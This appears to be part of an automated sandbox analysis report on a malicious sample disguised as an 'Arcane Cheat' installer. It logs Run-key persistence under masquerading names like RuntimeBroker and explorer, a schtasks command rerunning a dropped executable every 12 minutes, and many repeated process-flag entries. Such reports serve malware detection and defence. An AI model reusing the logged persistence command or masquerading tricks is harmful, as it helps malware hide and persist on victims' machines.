            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000 RegFiles0000 C:\Program Files (x86)\Arcane Cheat\Arcane Cheat.exeC:\Program Files (x86)\Arcane Cheat\jre\bin\awt.dllC:\Program Files (x86)\Arcane Cheat\jre\bin\bci.dllC:\Program Files (x86)\Arcane Cheat\jre\bin\dcpr.dllC:\Program Files (x86)\Arcane Cheat\jre\bin\decora_sse.dllC:\Program Files (x86)\Arcane Cheat\jre\bin\deploy.dllC:\Program Files (x86)\Arcane Cheat\jre\bin\dt_shmem.dllC:\Program Files (x86)\Arcane Cheat\jre\bin\dt_socket.dllC:\Program Files (x86)\Arcane Cheat\jre\bin\eula.dllC:\Program Files (x86)\Arcane Cheat\jre\bin\fontmanager.dllC:\Program Files (x86)\Arcane Cheat\jre\bin\fxplugins.dllC:\Program Files (x86)\Arcane Cheat\jre\bin\glass.dllC:\Program Files (x86)\Arcane Cheat\jre\bin\glib-lite.dllC:\Program Files (x86)\Arcane Cheat\jre\bin\gstreamer-lite.dllC:\Program Files (x86)\Arcane Cheat\jre\bin\hprof.dllC:\Program Files (x86)\Arcane Cheat\jre\bin\instrument.dllC:\Program Files (x86)\Arcane Cheat\jre\bin\j2pcsc.dllC:\Program Files (x86)\Arcane Cheat\jre\bin\j2pkcs11.dllC:\Program Files (x86)\Arcane Cheat\jre\bin\jaas_nt.dllC:\Program Files (x86)\Arcane Cheat\jre\bin\jabswitch.exeC:\Program Files (x86)\Arcane Cheat\jre\bin\java-rmi.exeC:\Program Files (x86)\Arcane Cheat\jre\bin\java.dllC:\Program Files (x86)\Arcane Cheat\jre\bin\java.exeC:\Program Files (x86)\Arcane Cheat\jre\bin\JavaAccessBridge-32.dllC:\Program Files (x86)\Arcane Cheat\jre\bin\JavaAccessBridge.dllC:\Program Files (x86)\Arcane Cheat\jre\bin\javacpl.exeC:\Program Files (x86)\Arcane Cheat\jre\bin\javafx_font.dllC:\Program Files (x86)\Arcane Cheat\jre\bin\javafx_font_t2k.dllC:\Program Files (x86)\Arcane Cheat\jre\bin\javafx_iio.dllC:\Program Files (x86)\Arcane Cheat\jre\bin\javaw.exeC:\Program Files (x86)\Arcane Cheat\jre\bin\javaws.exeC:\Program Files (x86)\Arcane 
Cheat\jre\bin\java_crw_demo.dllC:\Program Files (x86)\Arcane Cheat\jre\bin\jawt.dllC:\Program Files (x86)\Arcane Cheat\jre\bin\JAWTAccessBridge-32.dllC:\Program Files (x86)\Arcane Cheat\jre\bin\JAWTAccessBridge.dllC:\Program Files (x86)\Arcane ChJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run qiOZcVoixJLcuAFKAnRdJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBrokerJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WinStore.AppJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run audiodgJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run explorerJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "qiOZcVoixJLcuAFKAnRdq" /sc MINUTE /mo 12 /tr "'C:\Program Files\Uninstall Information\qiOZcVoixJLcuAFKAnRd.exe'" /f
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Arcane CheatJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmpFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Arcane Cheat\Arcane Cheat.lnkJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBrokerJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBrokerJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run audiodgJump to behavior
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run qiOZcVoixJLcuAFKAnRd
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run qiOZcVoixJLcuAFKAnRd
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run explorer

            Hooking and other Techniques for Hiding and Protection

            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Users\user\Desktop\uChcvn3L6R.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\Arcane CheatSetup.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\addins\audiodg.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Recovery\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
